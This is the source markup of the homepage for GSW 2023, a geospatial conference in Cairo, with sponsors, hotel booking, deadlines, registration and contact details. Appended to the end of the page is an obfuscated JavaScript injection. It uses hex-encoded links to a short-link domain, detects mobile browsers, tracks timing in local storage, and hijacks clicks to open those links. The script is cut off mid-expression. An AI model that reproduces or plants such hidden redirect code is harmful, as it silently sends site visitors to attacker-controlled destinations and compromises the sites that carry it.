css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^4551|url^https://gsw2023.com/wp-content/uploads/2023/05/image001.png|caption^null|alt^null|title^image001|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 